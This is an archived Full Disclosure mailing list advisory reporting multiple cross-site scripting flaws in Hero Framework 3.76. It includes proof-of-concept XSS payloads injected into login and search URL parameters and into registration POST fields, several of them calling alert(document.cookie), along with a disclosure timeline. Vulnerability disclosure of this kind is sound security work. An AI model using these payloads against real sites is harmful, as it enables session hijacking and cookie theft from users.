Full Disclosure mailing list archives
Hero Framework 3.76 Multiple Cross-site Scripting vulnerabilities
From: Stefan Schurtz <sschurtz () t-online de>
Date: Thu, 10 Jan 2013 19:49:19 +0100
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Advisory: Hero Framework 3.76 Multiple Cross-site Scripting vulnerabilities Advisory ID: SSCHADV2012-023 Author: Stefan Schurtz Affected Software: Successfully tested on Hero Framework 3.76 Vendor URL: http://www.heroframework.com/ Vendor Status: informed =========================== Vulnerability Description =========================== Hero Framework 3.76 is prone to multiple Cross-Site Scripting vulnerabilities ====================== PoC-Exploit ====================== http://[target]/hero_os/users/login?errors=true&username='"></style></script><script>alert(document.cookie)</script> http://[target]/hero_os/search?q=" onmouseover%3dalert(/XSS/) %3d" http://[target]/hero_os/users/login?errors=true&username=" onmouseover%3dalert(/XSS/) %3d" // POST-Parameter Username: '"><script>alert(document.cookie)</script> First Name: '"><script>alert(document.cookie)</script> Last Name: '"><script>alert(document.cookie)</script> ====================== Solution ====================== - - ====================== Disclosure Timeline ====================== 16-Dec-2012 - informed via contact form 16-Dec-2012 - feedback from vendor ====================== Credits ====================== Vulnerabilities found and advisory written by Stefan Schurtz. ====================== References ====================== http://www.darksecurity.de/advisories/2012/SSCHADV2012-023.txt -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.12 (MingW32) Comment: Thunderbird-Portable 3.1.20 by GnuPT - Gnu Privacy Tools Comment: Download at: http://thunderbird.gnupt.de iEYEARECAAYFAlDvDSwACgkQg3svV2LcbMBDvQCeOwalzm6ixV0mwEARVAj5CpU8 nmcAn25XSY+IieYYbN4tn37O9jd2+LcC =n4gk -----END PGP SIGNATURE----- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Hero Framework 3.76 Multiple Cross-site Scripting vulnerabilities Stefan Schurtz (Jan 10)